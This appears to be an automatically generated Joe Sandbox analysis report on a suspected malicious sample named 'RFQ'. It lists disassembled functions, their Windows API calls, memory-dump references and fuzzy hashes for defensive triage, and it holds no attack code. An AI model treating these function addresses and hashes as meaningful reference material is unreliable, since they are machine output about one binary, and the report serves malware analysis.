                                                                                                                                                    • Opcode Fuzzy Hash: 91422d5d2773dfc32c91834fd70de1372f147dc41e263ca789b8436364995790
                                                                                                                                                    • Instruction Fuzzy Hash: 1211E631305111AFEB54AB18DC09FBA7799FF86320F14811AF81AC72E2DB78AC018795
                                                                                                                                                    Function 00770AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00771E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00770ABB,?,?,?,0077187A,00000000,000000EF,00000119,?,?), ref: 00771E77
                                                                                                                                                      • Part of subcall function 00771E68: lstrcpyW.KERNEL32(00000000,?,?,00770ABB,?,?,?,0077187A,00000000,000000EF,00000119,?,?,00000000), ref: 00771E9D
                                                                                                                                                      • Part of subcall function 00771E68: lstrcmpiW.KERNEL32(00000000,?,00770ABB,?,?,?,0077187A,00000000,000000EF,00000119,?,?), ref: 00771ECE
                                                                                                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0077187A,00000000,000000EF,00000119,?,?,00000000), ref: 00770AD4
                                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,0077187A,00000000,000000EF,00000119,?,?,00000000), ref: 00770AFA
                                                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0077187A,00000000,000000EF,00000119,?,?,00000000), ref: 00770B2E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                    • String ID: cdecl
                                                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                                                    • Opcode ID: 76bca2a8c2a27e3a54704287180c2b079005ac46831ef86fe0ea0b69f364678d
                                                                                                                                                    • Instruction ID: 08de5a81eb396e12a6e3be9ed31017ef247c053062402a006524143334f62932
                                                                                                                                                    • Opcode Fuzzy Hash: 76bca2a8c2a27e3a54704287180c2b079005ac46831ef86fe0ea0b69f364678d
                                                                                                                                                    • Instruction Fuzzy Hash: 3511B476200305EFDF259F34DC05E7A77A8FF45354B80812AE809CB260EB759951C7E0
                                                                                                                                                    Function 00762F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 00762FB5
                                                                                                                                                      • Part of subcall function 0075395C: __FF_MSGBANNER.LIBCMT ref: 00753973
                                                                                                                                                      • Part of subcall function 0075395C: __NMSG_WRITE.LIBCMT ref: 0075397A
                                                                                                                                                      • Part of subcall function 0075395C: RtlAllocateHeap.NTDLL(01020000,00000000,00000001,00000001,00000000,?,?,0074F507,?,0000000E), ref: 0075399F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 614378929-0
                                                                                                                                                    • Opcode ID: e4835b190489d5cd2ed29f052d64a4a828c68edb01727083810cea2991fd2900
                                                                                                                                                    • Instruction ID: 75473d6ab759067330352b12d7b63a521c5981201e29e4177d3878da0a7ee763
                                                                                                                                                    • Opcode Fuzzy Hash: e4835b190489d5cd2ed29f052d64a4a828c68edb01727083810cea2991fd2900
                                                                                                                                                    • Instruction Fuzzy Hash: 1F11CD31509615DBDB353B70AC097EE3B98AF04362F208525FC4A9A152DB7DCD44D6A4
                                                                                                                                                    Function 0074EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0074EBB2
                                                                                                                                                      • Part of subcall function 007351AF: _memset.LIBCMT ref: 0073522F
                                                                                                                                                      • Part of subcall function 007351AF: _wcscpy.LIBCMT ref: 00735283
                                                                                                                                                      • Part of subcall function 007351AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00735293
                                                                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 0074EC07
                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0074EC16
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007A3C88
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1378193009-0
                                                                                                                                                    • Opcode ID: 95816acf6e80396a0ca6c7871001198f4f13b129c6d6872f2304daa8afa172a6
                                                                                                                                                    • Instruction ID: e26f6c33c556ca0a5675a2dad8ce5d4946a981abbdc20a80425075167c9e10ae
                                                                                                                                                    • Opcode Fuzzy Hash: 95816acf6e80396a0ca6c7871001198f4f13b129c6d6872f2304daa8afa172a6
                                                                                                                                                    • Instruction Fuzzy Hash: 1121D7709047849FE7329B288C59BE7BBECAB42318F04058DF68A56281D77C2A84CB61
                                                                                                                                                    Function 0077058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007705AC
                                                                                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007705C7
                                                                                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007705DD
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00770632
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3137044355-0
                                                                                                                                                    • Opcode ID: c323dc340b1510e5446eeb7c78c626df2195b453d920525e3ad052724ffafb9b
                                                                                                                                                    • Instruction ID: e5346c6af8bb7179970847740e325b80d69dca71a7f710ba8d6d62b7946ab176
                                                                                                                                                    • Opcode Fuzzy Hash: c323dc340b1510e5446eeb7c78c626df2195b453d920525e3ad052724ffafb9b
                                                                                                                                                    • Instruction Fuzzy Hash: DE217C71900209EFDF208FA5DC98EDABBB8EF40780F00C569E51AD2050E778EA55DFA1
                                                                                                                                                    Function 00776713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00776733
                                                                                                                                                    • _memset.LIBCMT ref: 00776754
                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007767A6
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 007767AF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1157408455-0
                                                                                                                                                    • Opcode ID: 34b3dc0dbe5987438af5dca775e0338fbaa556879b4121e5de471d31f5e35c68
                                                                                                                                                    • Instruction ID: 49930d27f671b47d7ad6a293b0c9b2027efff35e16ff88be4e9ab0912a769e5f
                                                                                                                                                    • Opcode Fuzzy Hash: 34b3dc0dbe5987438af5dca775e0338fbaa556879b4121e5de471d31f5e35c68
                                                                                                                                                    • Instruction Fuzzy Hash: 2111CD759012287AD7305765AC4DFDB7ABCEF44764F104196F508E71D0D2744E408BA4
                                                                                                                                                    Function 0076B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0076AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0076AA79
                                                                                                                                                      • Part of subcall function 0076AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0076AA83
                                                                                                                                                      • Part of subcall function 0076AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0076AA92
                                                                                                                                                      • Part of subcall function 0076AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0076AA99
                                                                                                                                                      • Part of subcall function 0076AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0076AAAF
                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,0076ADE4,?,?), ref: 0076B21B
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0076B227
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0076B22E
                                                                                                                                                    • CopySid.ADVAPI32(?,00000000,?), ref: 0076B247
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4217664535-0
                                                                                                                                                    • Opcode ID: 3dbf45c8501f59037fc2985be56577adada7534f1046b18b13c987fb866855b9
                                                                                                                                                    • Instruction ID: aeaffca939272b52db931636161329c97d9765a695d3f12346d63b6d939f63a2
                                                                                                                                                    • Opcode Fuzzy Hash: 3dbf45c8501f59037fc2985be56577adada7534f1046b18b13c987fb866855b9
                                                                                                                                                    • Instruction Fuzzy Hash: 4A113072A00205EFDB149F98DC95AAEB7E9FF85314B14806DE943E7211D7399E84DB10
                                                                                                                                                    Function 0076B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0076B498
                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0076B4AA
                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0076B4C0
                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0076B4DB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: a5248288cb0860008302f983528fc0cd2741564e8352c5232ec10f8cada8c187
                                                                                                                                                    • Instruction ID: 472e082d7f2f4553977e83bd16e28256f449e1e6e6fa2122e97da0c201dcdb41
                                                                                                                                                    • Opcode Fuzzy Hash: a5248288cb0860008302f983528fc0cd2741564e8352c5232ec10f8cada8c187
                                                                                                                                                    • Instruction Fuzzy Hash: 3611487A900218FFDB11DFA8C885E9DBBB8FB09740F204091EA05B7290DB71AE51DB94
                                                                                                                                                    Function 0074B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0074B5A5
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 007AE69A
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 007AE6A4
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 007AE6AF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4127811313-0
                                                                                                                                                    • Opcode ID: bad787180dfb1576f4ed71f63d608ca96fcc07618cfac2baa1ebb502defc4da9
                                                                                                                                                    • Instruction ID: 68f3a30159900391b4442a8bfec41efe8b65742e93d42baf5154e00bf4f3998b
                                                                                                                                                    • Opcode Fuzzy Hash: bad787180dfb1576f4ed71f63d608ca96fcc07618cfac2baa1ebb502defc4da9
                                                                                                                                                    • Instruction Fuzzy Hash: 6C11F83150002AFBCB20AFA4DD499AEB7B9EF49305F504555E901E6140D738AEA1CBA5
                                                                                                                                                    Function 0077732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00777352
                                                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00777385
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0077739B
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007773A2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2880819207-0
                                                                                                                                                    • Opcode ID: 48f5c102e6e80116bb54e6d1e663bb11221c27bf297aaa6948f0314c36af318c
                                                                                                                                                    • Instruction ID: f9904c31da63ee4688a96df8399b188cd22b755dc9eca5d426bf2679823c52f8
                                                                                                                                                    • Opcode Fuzzy Hash: 48f5c102e6e80116bb54e6d1e663bb11221c27bf297aaa6948f0314c36af318c
                                                                                                                                                    • Instruction Fuzzy Hash: 86110872A04244AFCB059B6CDC09FEE7BADAB45350F04C325F925D3261E6788D00C7A4
                                                                                                                                                    Function 0074D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0074D1BA
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 0074D1CE
                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0074D1D8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3970641297-0
                                                                                                                                                    • Opcode ID: 3b21bb226e203b483612b19f35c76a213dbea212cf798d566ca8499fe0c46e2d
                                                                                                                                                    • Instruction ID: 3ba5f362c1d0338bc9f60eddbb3a46cf98b1cec08a8845d4cbee20a517f40d4d
                                                                                                                                                    • Opcode Fuzzy Hash: 3b21bb226e203b483612b19f35c76a213dbea212cf798d566ca8499fe0c46e2d
                                                                                                                                                    • Instruction Fuzzy Hash: 5D11AD7250150DBFEF224F90DC54EEABB6AFF09364F054216FE5452050DB399C60DBA0
                                                                                                                                                    Function 00764DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                    • Instruction ID: cf39c48c20e075eed44b6977dd3ab5213121c994b7fd5fadb8ad4e7d07c2082c
                                                                                                                                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                    • Instruction Fuzzy Hash: 9E01363200014AFBCF165E94DC158EE3F22BB18354F588455FE2A59121D33BCAB2AB81
                                                                                                                                                    Function 00757452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00757A0D: __getptd_noexit.LIBCMT ref: 00757A0E
                                                                                                                                                    • __lock.LIBCMT ref: 0075748F
                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 007574AC
                                                                                                                                                    • _free.LIBCMT ref: 007574BF
                                                                                                                                                    • InterlockedIncrement.KERNEL32(010326F0), ref: 007574D7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2704283638-0
                                                                                                                                                    • Opcode ID: a3b04e95890227af7a6d29cd1c7ed60bcfa3e45ef1fe0e857f4ddde5791f6362
                                                                                                                                                    • Instruction ID: b5821b324ad57626b91d0ff9a645060bc7be598eab9a35576673eabf764a5e27
                                                                                                                                                    • Opcode Fuzzy Hash: a3b04e95890227af7a6d29cd1c7ed60bcfa3e45ef1fe0e857f4ddde5791f6362
                                                                                                                                                    • Instruction Fuzzy Hash: D601C4319066A1E7D729AF29B44DBDDBB60BF08723F158005FC1467690C7AC6909CFD6
                                                                                                                                                    Function 0079E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0079E33D
                                                                                                                                                    • _memset.LIBCMT ref: 0079E34C
                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007F3D00,007F3D44), ref: 0079E37B
                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0079E38D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3277943733-0
                                                                                                                                                    • Opcode ID: 4d104417ec0918bdbdb2a621e7abe2fe24f77c268e3bd2725a30ec0b677d323d
                                                                                                                                                    • Instruction ID: 78a278ab1b6c1ad1e853e48d85dca85e23504df3ef8a8168c2b68d8664279dfd
                                                                                                                                                    • Opcode Fuzzy Hash: 4d104417ec0918bdbdb2a621e7abe2fe24f77c268e3bd2725a30ec0b677d323d
                                                                                                                                                    • Instruction Fuzzy Hash: EBF03AF1740304BAE2105B60AC49FB77A6CDB04754F008421BE08DA2A2D27D9E0086A8
                                                                                                                                                    Function 0079EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
